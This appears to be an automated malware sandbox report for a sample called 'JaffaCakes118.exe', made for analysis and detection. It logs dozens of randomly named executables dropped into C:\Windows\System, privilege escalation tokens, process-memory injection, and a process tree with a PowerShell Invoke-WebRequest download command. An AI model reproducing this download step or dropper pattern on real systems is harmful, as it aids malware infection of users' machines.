File created C:\Windows\System\kvHOcHJ.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\fZboZOp.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\qISkDoj.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\YGRlnmc.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\wPjBWva.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\lKJzeQo.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\YVfzCkX.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\dNzCLYL.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\zjlmJSI.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\WUQWJVB.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\tVVzMcS.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\wOkgwyc.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\HDEaYpV.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\OtYpcOq.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\GddHKRN.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\URpzldH.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\uVNqNwu.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\RPANjDl.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\ymuEMQQ.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\KjWGNYb.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\CHoGFQH.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\eZgSzPh.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\WqlgZBV.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\NOgqefK.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\sBTYMZL.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\hswnelV.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\WFmbdSe.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\XHiIdcb.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\LKjIEWD.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\oOmQyXI.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\ZsdvHDo.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\xkHTBJs.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\msXgaSr.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\fYExchr.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\PpvNxtt.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\ikNKrLH.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\UoRHkOM.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\PpMapmh.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\aOdKEhA.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\cHxqhpI.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\EiLrRSm.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\rJqvRql.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\sYpfjoP.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4624 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\PuHgCKg.exe
PID 4624 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\PuHgCKg.exe
PID 4624 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\ShEInBR.exe
PID 4624 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\ShEInBR.exe
PID 4624 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\BsFBNxF.exe
PID 4624 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\BsFBNxF.exe
PID 4624 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\nVICBBS.exe
PID 4624 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\nVICBBS.exe
PID 4624 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\lHSyrMt.exe
PID 4624 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\lHSyrMt.exe
PID 4624 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\dvDcKme.exe
PID 4624 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\dvDcKme.exe
PID 4624 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\eIXnFtY.exe
PID 4624 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\eIXnFtY.exe
PID 4624 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\gZMRnqY.exe
PID 4624 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\gZMRnqY.exe
PID 4624 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\FLyqUmH.exe
PID 4624 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\FLyqUmH.exe
PID 4624 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\bYsaOcR.exe
PID 4624 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\bYsaOcR.exe
PID 4624 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\NZRmyog.exe
PID 4624 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\NZRmyog.exe
PID 4624 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\PgCyeDU.exe
PID 4624 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\PgCyeDU.exe
PID 4624 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\UvYZVXs.exe
PID 4624 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\UvYZVXs.exe
PID 4624 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\htIKkOL.exe
PID 4624 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\htIKkOL.exe
PID 4624 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\iGiIrhU.exe
PID 4624 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\iGiIrhU.exe
PID 4624 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\ysbayia.exe
PID 4624 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\ysbayia.exe
PID 4624 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\erUvdcv.exe
PID 4624 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\erUvdcv.exe
PID 4624 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\ZYuODNQ.exe
PID 4624 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\ZYuODNQ.exe
PID 4624 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\rxzjnAz.exe
PID 4624 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\rxzjnAz.exe
PID 4624 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\EKpULeb.exe
PID 4624 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\EKpULeb.exe
PID 4624 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\qkgmUNv.exe
PID 4624 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\qkgmUNv.exe
PID 4624 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\xSqnjAu.exe
PID 4624 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\xSqnjAu.exe
PID 4624 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\HaskdEV.exe
PID 4624 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\HaskdEV.exe
PID 4624 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\YYlJRxL.exe
PID 4624 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\YYlJRxL.exe
PID 4624 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\fJXdyIQ.exe
PID 4624 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\fJXdyIQ.exe
PID 4624 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\VKoHOcE.exe
PID 4624 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\VKoHOcE.exe
PID 4624 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\nKLdfOV.exe
PID 4624 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\nKLdfOV.exe
PID 4624 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\KLUwUZh.exe
PID 4624 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\KLUwUZh.exe
PID 4624 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\owIqajs.exe
PID 4624 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\owIqajs.exe
PID 4624 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\KeZkeEJ.exe
PID 4624 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\KeZkeEJ.exe
PID 4624 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\uTuUecx.exe
PID 4624 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\uTuUecx.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\PuHgCKg.exe

C:\Windows\System\PuHgCKg.exe

C:\Windows\System\ShEInBR.exe

C:\Windows\System\ShEInBR.exe

C:\Windows\System\BsFBNxF.exe

C:\Windows\System\BsFBNxF.exe

C:\Windows\System\nVICBBS.exe

C:\Windows\System\nVICBBS.exe

C:\Windows\System\lHSyrMt.exe

C:\Windows\System\lHSyrMt.exe

C:\Windows\System\dvDcKme.exe

C:\Windows\System\dvDcKme.exe

C:\Windows\System\eIXnFtY.exe

C:\Windows\System\eIXnFtY.exe

C:\Windows\System\gZMRnqY.exe

C:\Windows\System\gZMRnqY.exe

C:\Windows\System\FLyqUmH.exe

C:\Windows\System\FLyqUmH.exe

C:\Windows\System\bYsaOcR.exe

C:\Windows\System\bYsaOcR.exe

C:\Windows\System\NZRmyog.exe

C:\Windows\System\NZRmyog.exe

C:\Windows\System\PgCyeDU.exe

C:\Windows\System\PgCyeDU.exe

C:\Windows\System\UvYZVXs.exe

C:\Windows\System\UvYZVXs.exe

C:\Windows\System\htIKkOL.exe

C:\Windows\System\htIKkOL.exe

C:\Windows\System\iGiIrhU.exe

C:\Windows\System\iGiIrhU.exe

C:\Windows\System\ysbayia.exe

C:\Windows\System\ysbayia.exe

C:\Windows\System\erUvdcv.exe

C:\Windows\System\erUvdcv.exe

C:\Windows\System\ZYuODNQ.exe

C:\Windows\System\ZYuODNQ.exe

C:\Windows\System\rxzjnAz.exe

C:\Windows\System\rxzjnAz.exe

C:\Windows\System\EKpULeb.exe

C:\Windows\System\EKpULeb.exe

C:\Windows\System\qkgmUNv.exe

C:\Windows\System\qkgmUNv.exe

C:\Windows\System\xSqnjAu.exe

C:\Windows\System\xSqnjAu.exe

C:\Windows\System\HaskdEV.exe

C:\Windows\System\HaskdEV.exe

C:\Windows\System\YYlJRxL.exe

C:\Windows\System\YYlJRxL.exe

C:\Windows\System\fJXdyIQ.exe

C:\Windows\System\fJXdyIQ.exe

C:\Windows\System\VKoHOcE.exe

C:\Windows\System\VKoHOcE.exe

C:\Windows\System\nKLdfOV.exe

C:\Windows\System\nKLdfOV.exe

C:\Windows\System\KLUwUZh.exe

C:\Windows\System\KLUwUZh.exe

C:\Windows\System\owIqajs.exe

C:\Windows\System\owIqajs.exe

C:\Windows\System\KeZkeEJ.exe

C:\Windows\System\KeZkeEJ.exe

C:\Windows\System\uTuUecx.exe

C:\Windows\System\uTuUecx.exe

C:\Windows\System\mMMhDYB.exe

C:\Windows\System\mMMhDYB.exe

C:\Windows\System\eeDksRd.exe

C:\Windows\System\eeDksRd.exe

C:\Windows\System\kQbRmCr.exe

C:\Windows\System\kQbRmCr.exe

C:\Windows\System\vIbyXoz.exe

C:\Windows\System\vIbyXoz.exe

C:\Windows\System\xGIhIAx.exe

C:\Windows\System\xGIhIAx.exe

C:\Windows\System\qLZGrly.exe

C:\Windows\System\qLZGrly.exe

C:\Windows\System\hegkKeo.exe

C:\Windows\System\hegkKeo.exe

C:\Windows\System\ZHkRXJy.exe

C:\Windows\System\ZHkRXJy.exe

C:\Windows\System\HbIXCUu.exe

C:\Windows\System\HbIXCUu.exe

C:\Windows\System\OmusjIW.exe

C:\Windows\System\OmusjIW.exe

C:\Windows\System\ndcGhFA.exe

C:\Windows\System\ndcGhFA.exe

C:\Windows\System\FHiIwkQ.exe

C:\Windows\System\FHiIwkQ.exe

C:\Windows\System\KkotzWu.exe

C:\Windows\System\KkotzWu.exe

C:\Windows\System\kwTJBaQ.exe

C:\Windows\System\kwTJBaQ.exe

C:\Windows\System\UqILQbE.exe

C:\Windows\System\UqILQbE.exe

C:\Windows\System\sxeWtRh.exe

C:\Windows\System\sxeWtRh.exe

C:\Windows\System\MPceemw.exe

C:\Windows\System\MPceemw.exe

C:\Windows\System\CkMBQgE.exe

C:\Windows\System\CkMBQgE.exe

C:\Windows\System\RzsmTms.exe

C:\Windows\System\RzsmTms.exe

C:\Windows\System\jTUQPZT.exe

C:\Windows\System\jTUQPZT.exe

C:\Windows\System\XcGGkrV.exe

C:\Windows\System\XcGGkrV.exe

C:\Windows\System\ekjtatz.exe

C:\Windows\System\ekjtatz.exe

C:\Windows\System\CHoGFQH.exe

C:\Windows\System\CHoGFQH.exe

C:\Windows\System\JGEAzdc.exe

C:\Windows\System\JGEAzdc.exe

C:\Windows\System\IjUdRbS.exe

C:\Windows\System\IjUdRbS.exe

C:\Windows\System\xjUPPhj.exe

C:\Windows\System\xjUPPhj.exe

C:\Windows\System\jWDgbMp.exe

C:\Windows\System\jWDgbMp.exe

C:\Windows\System\xsbcCwL.exe

C:\Windows\System\xsbcCwL.exe

C:\Windows\System\WuHISGO.exe

C:\Windows\System\WuHISGO.exe

C:\Windows\System\xymikGd.exe

C:\Windows\System\xymikGd.exe

C:\Windows\System\xUElmLI.exe

C:\Windows\System\xUElmLI.exe

C:\Windows\System\NkuUdRt.exe

C:\Windows\System\NkuUdRt.exe

C:\Windows\System\ynlYOrR.exe

C:\Windows\System\ynlYOrR.exe

C:\Windows\System\QNAydyt.exe

C:\Windows\System\QNAydyt.exe

C:\Windows\System\OhYCFoZ.exe

C:\Windows\System\OhYCFoZ.exe

C:\Windows\System\VyXuttY.exe

C:\Windows\System\VyXuttY.exe

C:\Windows\System\ZZGhqaJ.exe

C:\Windows\System\ZZGhqaJ.exe

C:\Windows\System\akSqOFy.exe

C:\Windows\System\akSqOFy.exe

C:\Windows\System\XAriCIh.exe

C:\Windows\System\XAriCIh.exe

C:\Windows\System\tAGrYVp.exe

C:\Windows\System\tAGrYVp.exe

C:\Windows\System\DihKPds.exe

C:\Windows\System\DihKPds.exe

C:\Windows\System\roFsMEB.exe

C:\Windows\System\roFsMEB.exe

C:\Windows\System\olgmdQA.exe

C:\Windows\System\olgmdQA.exe

C:\Windows\System\nztZBHL.exe

C:\Windows\System\nztZBHL.exe

C:\Windows\System\PpvNxtt.exe

C:\Windows\System\PpvNxtt.exe

C:\Windows\System\zjlmJSI.exe

C:\Windows\System\zjlmJSI.exe

C:\Windows\System\PHKrMMi.exe

C:\Windows\System\PHKrMMi.exe

C:\Windows\System\URpzldH.exe

C:\Windows\System\URpzldH.exe

C:\Windows\System\eZgSzPh.exe

C:\Windows\System\eZgSzPh.exe

C:\Windows\System\SfEvdvJ.exe

C:\Windows\System\SfEvdvJ.exe

C:\Windows\System\WqlgZBV.exe

C:\Windows\System\WqlgZBV.exe

C:\Windows\System\JUSryfk.exe

C:\Windows\System\JUSryfk.exe

C:\Windows\System\fwgEzYE.exe

C:\Windows\System\fwgEzYE.exe

C:\Windows\System\PniCeSP.exe

C:\Windows\System\PniCeSP.exe

C:\Windows\System\PQmQgFx.exe

C:\Windows\System\PQmQgFx.exe

C:\Windows\System\vjjTNIy.exe

C:\Windows\System\vjjTNIy.exe

C:\Windows\System\LAlWKiQ.exe

C:\Windows\System\LAlWKiQ.exe

C:\Windows\System\dDnfPCX.exe

C:\Windows\System\dDnfPCX.exe

C:\Windows\System\sSgMySs.exe

C:\Windows\System\sSgMySs.exe

C:\Windows\System\KMbVTMl.exe

C:\Windows\System\KMbVTMl.exe

C:\Windows\System\WFmbdSe.exe

C:\Windows\System\WFmbdSe.exe

C:\Windows\System\rXFEIko.exe

C:\Windows\System\rXFEIko.exe

C:\Windows\System\tKTCQyN.exe

C:\Windows\System\tKTCQyN.exe

C:\Windows\System\LXwBQPr.exe

C:\Windows\System\LXwBQPr.exe

C:\Windows\System\dOcCUNb.exe

C:\Windows\System\dOcCUNb.exe

C:\Windows\System\obERSdk.exe

C:\Windows\System\obERSdk.exe

C:\Windows\System\LjzmHeS.exe

C:\Windows\System\LjzmHeS.exe

C:\Windows\System\GVJabBQ.exe

C:\Windows\System\GVJabBQ.exe

C:\Windows\System\IEqPktl.exe

C:\Windows\System\IEqPktl.exe

C:\Windows\System\ROFsAsz.exe

C:\Windows\System\ROFsAsz.exe

C:\Windows\System\FOdtCEg.exe

C:\Windows\System\FOdtCEg.exe

C:\Windows\System\PLZSznp.exe

C:\Windows\System\PLZSznp.exe

C:\Windows\System\poavyYo.exe

C:\Windows\System\poavyYo.exe

C:\Windows\System\jXATcLc.exe

C:\Windows\System\jXATcLc.exe

C:\Windows\System\hjXLCvn.exe

C:\Windows\System\hjXLCvn.exe

C:\Windows\System\EXZlweD.exe

C:\Windows\System\EXZlweD.exe

C:\Windows\System\BCcKbBi.exe

C:\Windows\System\BCcKbBi.exe

C:\Windows\System\tgyqRKL.exe

C:\Windows\System\tgyqRKL.exe

C:\Windows\System\SFgOZTe.exe

C:\Windows\System\SFgOZTe.exe

C:\Windows\System\sfJAugi.exe

C:\Windows\System\sfJAugi.exe

C:\Windows\System\spEcpRr.exe

C:\Windows\System\spEcpRr.exe

C:\Windows\System\cqEQWTm.exe

C:\Windows\System\cqEQWTm.exe

C:\Windows\System\UBYURnu.exe

C:\Windows\System\UBYURnu.exe

C:\Windows\System\ANFAqZu.exe

C:\Windows\System\ANFAqZu.exe

C:\Windows\System\oxZxTMT.exe

C:\Windows\System\oxZxTMT.exe

C:\Windows\System\sYpfjoP.exe

C:\Windows\System\sYpfjoP.exe

C:\Windows\System\dnQxAFk.exe

C:\Windows\System\dnQxAFk.exe

C:\Windows\System\pYBVkHs.exe

C:\Windows\System\pYBVkHs.exe

C:\Windows\System\GjOnaIV.exe

C:\Windows\System\GjOnaIV.exe

C:\Windows\System\nOqCVvV.exe

C:\Windows\System\nOqCVvV.exe

C:\Windows\System\yYrslMp.exe

C:\Windows\System\yYrslMp.exe

C:\Windows\System\pQrTdVD.exe

C:\Windows\System\pQrTdVD.exe

C:\Windows\System\OBvkkNL.exe

C:\Windows\System\OBvkkNL.exe

C:\Windows\System\TlgwVLk.exe

C:\Windows\System\TlgwVLk.exe

C:\Windows\System\bFUPcuv.exe

C:\Windows\System\bFUPcuv.exe

C:\Windows\System\VawkGXJ.exe

C:\Windows\System\VawkGXJ.exe

C:\Windows\System\yeIqhfP.exe

C:\Windows\System\yeIqhfP.exe

C:\Windows\System\MNupRFu.exe

C:\Windows\System\MNupRFu.exe

C:\Windows\System\AXSnqMV.exe

C:\Windows\System\AXSnqMV.exe

C:\Windows\System\miezJOv.exe

C:\Windows\System\miezJOv.exe

